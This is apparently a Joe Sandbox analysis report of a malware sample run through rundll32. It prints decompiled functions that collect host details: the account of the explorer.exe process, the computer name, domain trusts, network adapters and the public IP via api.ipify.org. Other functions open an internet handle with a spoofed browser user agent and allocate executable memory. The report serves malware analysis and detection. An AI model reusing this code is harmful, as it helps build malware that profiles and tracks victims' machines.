                                            			E001C3000(long _a4, CHAR* _a8, long _a12, CHAR* _a16, long _a20) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				union _TOKEN_INFORMATION_CLASS _v28;
				union _SID_NAME_USE _v32;
				int _t31;
				int _t37;
				int _t43;

				_v12 = OpenProcess(0x400, 0, _a4);
				if(_v12 != 0) {
					if(OpenProcessToken(_v12, 0x20008,  &_v16) != 0) {
						_v8 = 0;
						_t31 = GetTokenInformation(_v16, 1, 0, 0,  &_v8); // executed
						if(_t31 != 0 || GetLastError() != 0x7a) {
							return 0;
						} else {
							_v24 = E001C1390(_v8);
							_v20 = _v24;
							_v28 = 0;
							_t37 = GetTokenInformation(_v16, 1, _v20, _v8,  &_v8); // executed
							if(_t37 != 0) {
								_t43 = LookupAccountSidA(0,  *_v20, _a8,  &_a12, _a16,  &_a20,  &_v32); // executed
								if(_t43 != 0) {
									_v28 = 1;
								}
							}
							E001C13D0(_v24);
							return _v28;
						}
					}
					return 0;
				}
				return 0;
			}













                                            0x001c3017
                                            0x001c301e
                                            0x001c303c
                                            0x001c3045
                                            0x001c305a
                                            0x001c3062
                                            0x00000000
                                            0x001c3073
                                            0x001c307f
                                            0x001c3085
                                            0x001c3088
                                            0x001c30a1
                                            0x001c30a9
                                            0x001c30c7
                                            0x001c30cf
                                            0x001c30d1
                                            0x001c30d1
                                            0x001c30cf
                                            0x001c30dc
                                            0x00000000
                                            0x001c30e4
                                            0x001c3062
                                            0x00000000
                                            0x001c303e
                                            0x00000000

                                            APIs
                                            • OpenProcess.KERNEL32(00000400,00000000,?,?,001C2E45,?,?,00000104,?,00000104), ref: 001C3011
                                            • OpenProcessToken.ADVAPI32(00000000,00020008,00000104,?,001C2E45,?,?,00000104), ref: 001C3034
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: OpenProcess$Token
                                            • String ID:
                                            • API String ID: 2935449343-0
                                            • Opcode ID: 1d48ae6ee3bab75246e6f8ca7dd1c57a6d9a8e5ecf60a8664c62539c4fb4e313
                                            • Instruction ID: 90c49833be052634c9d2c456227d4b168a05594501a285dd9a5d63e462408ebe
                                            • Opcode Fuzzy Hash: 1d48ae6ee3bab75246e6f8ca7dd1c57a6d9a8e5ecf60a8664c62539c4fb4e313
                                            • Instruction Fuzzy Hash: 45312BB6A40209AFDB10CFA4CC85FEE77B8AB58705F10855CF615E6280E771EA54CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C2520, Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 42stringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 182 1c2520-1c2535 183 1c254d-1c255d call 1c1fe0 182->183 184 1c2537-1c254b lstrcpyA 182->184 187 1c2562-1c2568 183->187 186 1c25aa-1c25ad 184->186 188 1c258a-1c25a8 lstrcpyA 187->188 189 1c256a-1c2588 lstrcpyA 187->189 188->186 189->186
                                            C-Code - Quality: 100%
                                            			E001C2520(void* __ecx, CHAR* _a4) {
				char _v8;
				void* _t10;

				if( *0x001C7280 == 0) {
					_t10 = E001C1FE0("http://api.ipify.org", "84.17.52.3", 0x20,  &_v8); // executed
					if(_t10 != 1) {
						 *((char*)(0x1c7280)) = 0;
						lstrcpyA(_a4, "0.0.0.0");
						return 0;
					}
					 *((char*)(_v8 + 0x1c7280)) = 0;
					lstrcpyA(_a4, "84.17.52.3");
					return 1;
				}
				lstrcpyA(_a4, "84.17.52.3");
				return 1;
			}





                                            0x001c2535
                                            0x001c255d
                                            0x001c2568
                                            0x001c2592
                                            0x001c25a2
                                            0x00000000
                                            0x001c25a8
                                            0x001c256d
                                            0x001c257d
                                            0x00000000
                                            0x001c2583
                                            0x001c2540
                                            0x00000000

                                            APIs
                                            • lstrcpyA.KERNEL32(001C1AD9,84.17.52.3,?,?,001C1AD9,?,?), ref: 001C2540
                                            • lstrcpyA.KERNEL32(001C1AD9,84.17.52.3,?,?,001C1AD9,?,?), ref: 001C257D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy
                                            • String ID: 0.0.0.0$84.17.52.3$http://api.ipify.org
                                            • API String ID: 3722407311-2520019587
                                            • Opcode ID: 4d059f63c87c3cb4ef06b33742bb5d0c985da9231121c23d9c511440710c4adc
                                            • Instruction ID: f712e9514d5ffd67d73ced4951a3157414db787eeebc29b5f69f39df19453965
                                            • Opcode Fuzzy Hash: 4d059f63c87c3cb4ef06b33742bb5d0c985da9231121c23d9c511440710c4adc
                                            • Instruction Fuzzy Hash: 1B01D63974C200ABD7148BA8CC2AFEABBA8EB25700F14415CF5048B2C1C7F6E9808BD1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C30F0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39stringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 230 1c30f0-1c3122 GetComputerNameA 231 1c3124-1c312f lstrcatA 230->231 232 1c3135-1c3155 lstrcatA call 1c2df0 230->232 231->232 235 1c3168-1c3170 232->235 236 1c3157-1c3162 lstrcatA 232->236 236->235
                                            C-Code - Quality: 100%
                                            			E001C30F0(CHAR* _a4) {
				long _v8;
				char _v268;
				char _v528;
				int _t14;
				void* _t16;

				 *_a4 = 0;
				_v8 = 0x104;
				_t14 = GetComputerNameA( &_v268,  &_v8); // executed
				_t31 = _t14;
				if(_t14 != 0) {
					lstrcatA(_a4,  &_v268);
				}
				lstrcatA(_a4, " @ ");
				_t16 = E001C2DF0(_t31,  &_v528); // executed
				if(_t16 != 0) {
					lstrcatA(_a4,  &_v528);
				}
				return 1;
			}








                                            0x001c3104
                                            0x001c3108
                                            0x001c311a
                                            0x001c3120
                                            0x001c3122
                                            0x001c312f
                                            0x001c312f
                                            0x001c313e
                                            0x001c314b
                                            0x001c3155
                                            0x001c3162
                                            0x001c3162
                                            0x001c3170

                                            APIs
                                            • GetComputerNameA.KERNEL32(?,00000104), ref: 001C311A
                                            • lstrcatA.KERNEL32(00100000,?), ref: 001C312F
                                            • lstrcatA.KERNEL32(00100000, @ ), ref: 001C313E
                                            • lstrcatA.KERNEL32(00100000,?), ref: 001C3162
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$ComputerName
                                            • String ID: @
                                            • API String ID: 2583549208-203157567
                                            • Opcode ID: 26b0cfcbf7b94adb9400ab3bd9d65154ac5876889380a7a1bee6d9f943edbb70
                                            • Instruction ID: 526a075a412d84abd70cc0223be8c17d10722798cc5943e1599fc09ca7563fc9
                                            • Opcode Fuzzy Hash: 26b0cfcbf7b94adb9400ab3bd9d65154ac5876889380a7a1bee6d9f943edbb70
                                            • Instruction Fuzzy Hash: 620181B5504308ABDB14DFA4DC58FDA7B7CAB58300F108198FA4A87251EB75DB84CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C23C0, Relevance: 7.6, APIs: 5, Instructions: 65COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 237 1c23c0-1c23e9 DsEnumerateDomainTrustsA 238 1c23eb-1c23ed 237->238 239 1c23f2-1c23f6 237->239 242 1c2487-1c248a 238->242 240 1c23f8-1c23fd 239->240 241 1c2402-1c2409 239->241 240->242 243 1c2414-1c241a 241->243 244 1c241c-1c2427 243->244 245 1c2482 243->245 246 1c244d-1c2459 244->246 247 1c2429-1c2447 lstrcatA * 2 244->247 245->242 248 1c245b-1c247a lstrcatA * 2 246->248 249 1c2480 246->249 247->246 248->249 249->243
                                            C-Code - Quality: 75%
                                            			E001C23C0(CHAR* _a4) {
				signed int _v8;
				char _v12;
				char _v16;
				char* _t30;

				 *_a4 = 0;
				_t30 =  &_v16;
				__imp__DsEnumerateDomainTrustsA(0, 0x3f,  &_v12, _t30); // executed
				if(_t30 == 0) {
					if(_v16 != 0) {
						_v8 = 0;
						while(_v8 < _v16) {
							if( *(_v12 + _v8 * 0x2c) != 0) {
								lstrcatA(_a4,  *(_v12 + _v8 * 0x2c));
								lstrcatA(_a4, ";");
							}
							if( *((intOrPtr*)(_v12 + 4 + _v8 * 0x2c)) != 0) {
								_t26 = 4 + _v8 * 0x2c; // 0xff25f845
								lstrcatA(_a4,  *(_v12 + _t26));
								lstrcatA(_a4, ";");
							}
							_v8 = _v8 + 1;
						}
						return 1;
					}
					return 1;
				}
				return 0;
			}







                                            0x001c23d1
                                            0x001c23d5
                                            0x001c23e1
                                            0x001c23e9
                                            0x001c23f6
                                            0x001c2402
                                            0x001c2414
                                            0x001c2427
                                            0x001c2438
                                            0x001c2447
                                            0x001c2447
                                            0x001c2459
                                            0x001c2462
                                            0x001c246b
                                            0x001c247a
                                            0x001c247a
                                            0x001c2411
                                            0x001c2411
                                            0x00000000
                                            0x001c2482
                                            0x00000000
                                            0x001c23f8
                                            0x00000000

                                            APIs
                                            • DsEnumerateDomainTrustsA.NETAPI32(00000000,0000003F,001C1AE8,?,?,001C1AE8,?,?,?), ref: 001C23E1
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: DomainEnumerateTrusts
                                            • String ID:
                                            • API String ID: 4051863571-0
                                            • Opcode ID: 0095fa9e7bd8991b3e408f06944e9fbbbfb23bd8d9da6889937bcaa491935c07
                                            • Instruction ID: 4e1fa7cc69ca3e15a623cc362806a9de04a1248d5038469e6f07cfb1deb59aa3
                                            • Opcode Fuzzy Hash: 0095fa9e7bd8991b3e408f06944e9fbbbfb23bd8d9da6889937bcaa491935c07
                                            • Instruction Fuzzy Hash: 46211D35A04209EBCB1CCF98D995FEDBB75EB54304F20819CE5069B291C774EA81DB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C2DF0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47stringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 251 1c2df0-1c2e4a call 1c2e90 call 1c3000 256 1c2e4c-1c2e82 lstrcpyA lstrcatA * 2 251->256 257 1c2e84 251->257 258 1c2e86-1c2e89 256->258 257->258
                                            C-Code - Quality: 100%
                                            			E001C2DF0(void* __eflags, CHAR* _a4) {
				long _v8;
				long _v12;
				long _v16;
				char _v276;
				char _v536;
				long _t16;
				void* _t20;

				_t16 = E001C2E90("explorer.exe"); // executed
				_v16 = _t16;
				_v12 = 0x104;
				_v8 = 0x104;
				 *_a4 = 0;
				_t20 = E001C3000(_v16,  &_v536, _v12,  &_v276, _v8); // executed
				if(_t20 == 0) {
					return 0;
				}
				lstrcpyA(_a4,  &_v276);
				lstrcatA(_a4, "\\");
				lstrcatA(_a4,  &_v536);
				return 1;
			}










                                            0x001c2dfe
                                            0x001c2e06
                                            0x001c2e09
                                            0x001c2e10
                                            0x001c2e22
                                            0x001c2e40
                                            0x001c2e4a
                                            0x00000000
                                            0x001c2e84
                                            0x001c2e57
                                            0x001c2e66
                                            0x001c2e77
                                            0x00000000

                                            APIs
                                              • Part of subcall function 001C2E90: K32EnumProcesses.KERNEL32(?,00001000,001C2E03), ref: 001C2EAD
                                              • Part of subcall function 001C3000: OpenProcess.KERNEL32(00000400,00000000,?,?,001C2E45,?,?,00000104,?,00000104), ref: 001C3011
                                            • lstrcpyA.KERNEL32(00000104,?), ref: 001C2E57
                                            • lstrcatA.KERNEL32(00000104,001C42B8), ref: 001C2E66
                                            • lstrcatA.KERNEL32(00000104,?), ref: 001C2E77
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$EnumOpenProcessProcesseslstrcpy
                                            • String ID: explorer.exe
                                            • API String ID: 1774016706-3187896405
                                            • Opcode ID: 608faca6047f9e603af5ee1d219b506ec0554aba1ff2097f610e7ea190438551
                                            • Instruction ID: 034611d0a09a39d9d857b45ddfdecd747b6a7248b9e5c81f09243060c86f299d
                                            • Opcode Fuzzy Hash: 608faca6047f9e603af5ee1d219b506ec0554aba1ff2097f610e7ea190438551
                                            • Instruction Fuzzy Hash: 5D1156B590420CABCB14DFA8DD55FDE7BB8EB58300F004198FA09D7241E775DA84CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C2F30, Relevance: 6.1, APIs: 4, Instructions: 58stringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 259 1c2f30-1c2f51 OpenProcess 260 1c2feb 259->260 261 1c2f57-1c2f7d K32GetProcessImageFileNameA CloseHandle 259->261 263 1c2fed-1c2ff0 260->263 261->260 262 1c2f7f-1c2f8d 261->262 264 1c2f98-1c2f9e 262->264 265 1c2fd0-1c2fd4 264->265 266 1c2fa0-1c2fae 264->266 265->260 269 1c2fd6-1c2fe9 lstrcpyA 265->269 267 1c2fbd-1c2fca 266->267 268 1c2fb0-1c2fba 266->268 270 1c2fcc 267->270 271 1c2fce 267->271 268->267 269->263 270->265 271->264
                                            C-Code - Quality: 85%
                                            			E001C2F30(long _a4, CHAR* _a8) {
				int _v8;
				void* _v12;
				CHAR* _v16;
				void* _v20;
				char _v280;
				void* _t29;
				void* _t48;

				_t29 = OpenProcess(0x400, 0, _a4);
				_v12 = _t29;
				if(_v12 == 0) {
					L12:
					return 0;
				}
				_push(0x104);
				_push( &_v280);
				_push(_v12); // executed
				L001C3BE3(); // executed
				_v20 = _t29;
				CloseHandle(_v12); // executed
				if(_v20 <= 0) {
					goto L12;
				}
				_v16 = 0;
				_v8 = 0;
				while(_v8 < _v20) {
					if( *((char*)(_t48 + _v8 - 0x114)) == 0x5c) {
						_v16 = _t48 + _v8 - 0x113;
					}
					if( *((char*)(_t48 + _v8 - 0x114)) != 0) {
						_v8 = _v8 + 1;
						continue;
					} else {
						break;
					}
				}
				if(_v16 == 0) {
					goto L12;
				}
				lstrcpyA(_a8, _v16);
				return 1;
			}










                                            0x001c2f44
                                            0x001c2f4a
                                            0x001c2f51
                                            0x001c2feb
                                            0x00000000
                                            0x001c2feb
                                            0x001c2f57
                                            0x001c2f62
                                            0x001c2f66
                                            0x001c2f67
                                            0x001c2f6c
                                            0x001c2f73
                                            0x001c2f7d
                                            0x00000000
                                            0x00000000
                                            0x001c2f7f
                                            0x001c2f86
                                            0x001c2f98
                                            0x001c2fae
                                            0x001c2fba
                                            0x001c2fba
                                            0x001c2fca
                                            0x001c2f95
                                            0x00000000
                                            0x001c2fcc
                                            0x00000000
                                            0x001c2fcc
                                            0x001c2fca
                                            0x001c2fd4
                                            0x00000000
                                            0x00000000
                                            0x001c2fde
                                            0x00000000

                                            APIs
                                            • OpenProcess.KERNEL32(00000400,00000000,001C2E03), ref: 001C2F44
                                            • K32GetProcessImageFileNameA.KERNEL32 ref: 001C2F67
                                            • CloseHandle.KERNEL32(00000000), ref: 001C2F73
                                            • lstrcpyA.KERNEL32(00000000,00000000), ref: 001C2FDE
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$CloseFileHandleImageNameOpenlstrcpy
                                            • String ID:
                                            • API String ID: 2420205050-0
                                            • Opcode ID: 65f6384c8f9cd3959720469abb51e0a436c65dd81da861903c183bce68152913
                                            • Instruction ID: 3f82080e1d48546e013153043a2b6e9b15929caff99caa71309158ea93e8703c
                                            • Opcode Fuzzy Hash: 65f6384c8f9cd3959720469abb51e0a436c65dd81da861903c183bce68152913
                                            • Instruction Fuzzy Hash: C3214774A0410CEBDB18CF98C994FEEBBB5BB54700F20819DE625A7280C7749E84DF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00181968, Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 68%
                                            			E00181968() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00181A1E);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x1945c4);
				L001812BC();
				if( *0x194045 != 0) {
					_push(0x1945c4);
					L001812C4();
				}
				E0018132C(0x1945e4);
				E0018132C(0x1945f4);
				E0018132C(0x194620);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x19461c = _t11;
				if( *0x19461c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x19461c; // 0x3d76a8
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x194608)) = 0x194604;
					 *0x194604 = 0x194604;
					 *0x194610 = 0x194604;
					 *0x1945bc = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00181A25);
				if( *0x194045 != 0) {
					_push(0x1945c4);
					L001812CC();
					return 0;
				}
				return 0;
			}








                                            0x0018196d
                                            0x0018196e
                                            0x00181973
                                            0x00181976
                                            0x00181979
                                            0x0018197e
                                            0x0018198a
                                            0x0018198c
                                            0x00181991
                                            0x00181991
                                            0x0018199b
                                            0x001819a5
                                            0x001819af
                                            0x001819bb
                                            0x001819c0
                                            0x001819cc
                                            0x001819ce
                                            0x001819d3
                                            0x001819d3
                                            0x001819db
                                            0x001819df
                                            0x001819e0
                                            0x001819ec
                                            0x001819ef
                                            0x001819f1
                                            0x001819f6
                                            0x001819f6
                                            0x001819ff
                                            0x00181a02
                                            0x00181a05
                                            0x00181a11
                                            0x00181a13
                                            0x00181a18
                                            0x00000000
                                            0x00181a18
                                            0x00181a1d

                                            APIs
                                            • RtlInitializeCriticalSection.KERNEL32(001945C4,00000000,00181A1E,?,?,00182202,00194604,00000000,00000000,?,?,00181BF1,00181C06,00181D57), ref: 0018197E
                                            • RtlEnterCriticalSection.KERNEL32(001945C4,001945C4,00000000,00181A1E,?,?,00182202,00194604,00000000,00000000,?,?,00181BF1,00181C06,00181D57), ref: 00181991
                                            • LocalAlloc.KERNEL32(00000000,00000FF8,001945C4,00000000,00181A1E,?,?,00182202,00194604,00000000,00000000,?,?,00181BF1,00181C06,00181D57), ref: 001819BB
                                            • RtlLeaveCriticalSection.KERNEL32(001945C4,00181A25,00000000,00181A1E,?,?,00182202,00194604,00000000,00000000,?,?,00181BF1,00181C06,00181D57), ref: 00181A18
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                            • String ID:
                                            • API String ID: 730355536-0
                                            • Opcode ID: 7f1abc3bb1ddd624ab0e1614ded573c340d0865780d464b505f60df5479fe45b
                                            • Instruction ID: 7a37b573b4de41935e19b492fe47cb9a695c510caabbaa9d94d942947106cf90
                                            • Opcode Fuzzy Hash: 7f1abc3bb1ddd624ab0e1614ded573c340d0865780d464b505f60df5479fe45b
                                            • Instruction Fuzzy Hash: 5801D6F1E042407FE725BBA99816F697BD9E71A701F01412AF100D79D1C7B44A83CF15
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C2E90, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 83%
                                            			E001C2E90(CHAR* _a4) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				char _v276;
				char _v4372;
				signed int _t23;
				void* _t26;
				int _t29;
				void* _t40;
				void* _t41;

				E001C1420(0x1110);
				_t23 =  &_v12;
				_push(_t23);
				_push(0x1000);
				_push( &_v4372); // executed
				L001C3BDD(); // executed
				if(_t23 != 0) {
					_v16 = _v12 >> 2;
					_v8 = 0;
					while(_v8 < _v16) {
						_t26 = E001C2F30( *((intOrPtr*)(_t40 + _v8 * 4 - 0x1110)),  &_v276); // executed
						_t41 = _t41 + 8;
						if(_t26 == 0) {
							L8:
							_t23 = _v8 + 1;
							_v8 = _t23;
							continue;
						}
						_t29 = lstrcmpiA( &_v276, _a4); // executed
						if(_t29 != 0) {
							goto L8;
						}
						return  *((intOrPtr*)(_t40 + _v8 * 4 - 0x1110));
					}
					return _t23 | 0xffffffff;
				}
				return _t23 | 0xffffffff;
			}













                                            0x001c2e98
                                            0x001c2e9d
                                            0x001c2ea0
                                            0x001c2ea1
                                            0x001c2eac
                                            0x001c2ead
                                            0x001c2eb4
                                            0x001c2ec1
                                            0x001c2ec4
                                            0x001c2ed6
                                            0x001c2ef0
                                            0x001c2ef5
                                            0x001c2efa
                                            0x001c2f1d
                                            0x001c2ed0
                                            0x001c2ed3
                                            0x00000000
                                            0x001c2ed3
                                            0x001c2f07
                                            0x001c2f0f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x001c2f14
                                            0x00000000
                                            0x001c2f1f
                                            0x00000000

                                            APIs
                                            • K32EnumProcesses.KERNEL32(?,00001000,001C2E03), ref: 001C2EAD
                                            • lstrcmpi.KERNEL32(?,001C2E03,?,?,001C2E03), ref: 001C2F07
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: EnumProcesseslstrcmpi
                                            • String ID: .>ov
                                            • API String ID: 1246086236-341798122
                                            • Opcode ID: 4d06710059a131988859e1944e8a0b2cccde372f460a5891b70500b2f9a04a71
                                            • Instruction ID: 87e1d2d55ba5d907bf308ead2f183d619278a26e9a3106d2de414bb5d259db59
                                            • Opcode Fuzzy Hash: 4d06710059a131988859e1944e8a0b2cccde372f460a5891b70500b2f9a04a71
                                            • Instruction Fuzzy Hash: 35112A7090010CABCB18DA98D841FEDB3B8BF69344F20469DFA2593280E730EE809B11
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C1C70, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 71%
                                            			E001C1C70(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t61;
				void* _t62;

				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x18], xmm0");
				_v12 = 0x8000;
				_t33 = E001C1390(_v12); // executed
				_t62 = _t61 + 4;
				_v16 = _t33;
				_v8 = _v16;
				_t34 = _v8;
				__imp__GetAdaptersAddresses(2, 0, 0, _t34,  &_v12); // executed
				_v20 = _t34;
				if(_v20 == 0) {
					while(_v8 != 0) {
						E001C14A0( &_v36, 0, 8);
						E001C1450( &_v36, _v8 + 0x2c,  *((intOrPtr*)(_v8 + 0x34)));
						_t62 = _t62 + 0x18;
						_v28 = _v28 ^ _v36;
						_v24 = _v24 ^ _v32;
						_v8 =  *((intOrPtr*)(_v8 + 8));
					}
				}
				E001C13D0(_v16);
				_t36 = E001C2490(); // executed
				_v44 = _t36;
				_v40 = 0;
				return E001C1400(_v44, 0x20, _v40) ^ _v28;
			}


















                                            0x001c1c76
                                            0x001c1c79
                                            0x001c1c7e
                                            0x001c1c89
                                            0x001c1c8e
                                            0x001c1c91
                                            0x001c1c97
                                            0x001c1c9e
                                            0x001c1ca8
                                            0x001c1cae
                                            0x001c1cb5
                                            0x001c1cb7
                                            0x001c1cc5
                                            0x001c1cdf
                                            0x001c1ce4
                                            0x001c1cf3
                                            0x001c1cf6
                                            0x001c1cff
                                            0x001c1cff
                                            0x001c1cb7
                                            0x001c1d08
                                            0x001c1d10
                                            0x001c1d17
                                            0x001c1d1a
                                            0x001c1d33

                                            APIs
                                              • Part of subcall function 001C1390: GetProcessHeap.KERNEL32(?,001C1886,00100000), ref: 001C139C
                                              • Part of subcall function 001C1390: RtlAllocateHeap.NTDLL(00390000,00000000,001C1886,?,001C1886,00100000), ref: 001C13BD
                                            • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,00008000), ref: 001C1CA8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AdaptersAddressesAllocateProcess
                                            • String ID: Mj<p
                                            • API String ID: 2964925633-780933577
                                            • Opcode ID: a1831e171269af26ef3c88371843e8a3d9e04b4fc500c96b5da0824f047f7ee5
                                            • Instruction ID: b822e735b984711f45d8ad8904d5f415b08b7b121a88ce7631c542439c629a4c
                                            • Opcode Fuzzy Hash: a1831e171269af26ef3c88371843e8a3d9e04b4fc500c96b5da0824f047f7ee5
                                            • Instruction Fuzzy Hash: 30210AB5D40209ABDB04DFE4C982FEEB7B5BF6C304F208159E905B7241E770AA44CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C24F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14networkCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E001C24F0() {
				void* _t1;
				void* _t2;

				if( *0x1c7270 == 0) {
					_t2 = InternetOpenA("Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko", 0, 0, 0, 0); // executed
					 *0x1c7270 = _t2;
				}
				_t1 =  *0x1c7270; // 0xcc0004
				return _t1;
			}





                                            0x001c24fa
                                            0x001c2509
                                            0x001c250f
                                            0x001c250f
                                            0x001c2514
                                            0x001c251a

                                            APIs
                                            • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko,00000000,00000000,00000000,00000000), ref: 001C2509
                                            Strings
                                            • Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko, xrefs: 001C2504
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: InternetOpen
                                            • String ID: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            • API String ID: 2038078732-3333256863
                                            • Opcode ID: e33ace0c40b0dd8681401011b7742f9a60f16b7730bd4d9299ec7f84ed733da0
                                            • Instruction ID: e849e8319bdc0e3eec11f38bf41ce6a8119e6f0deaaf60a8410280da96b81043
                                            • Opcode Fuzzy Hash: e33ace0c40b0dd8681401011b7742f9a60f16b7730bd4d9299ec7f84ed733da0
                                            • Instruction Fuzzy Hash: 14D0C930688704ABEA308B64ED16F51BAA4B354B14F200015B209669E0C7F0F4D98A59
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 000C6D70, Relevance: 3.2, APIs: 2, Instructions: 195memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 000C6DBB
                                            • VirtualProtect.KERNEL32(?,?,00000000), ref: 000C6F62
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150581095.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Virtual$AllocProtect
                                            • String ID:
                                            • API String ID: 2447062925-0
                                            • Opcode ID: 908ff1232115a672daceacccd1e388f79e6961393f0a3edebe41de14d0d5fad2
                                            • Instruction ID: b592054b19c47dab3a1b7ad9fe7ebea40de94e9a149ca6dbaf1df09dffb7cfa5
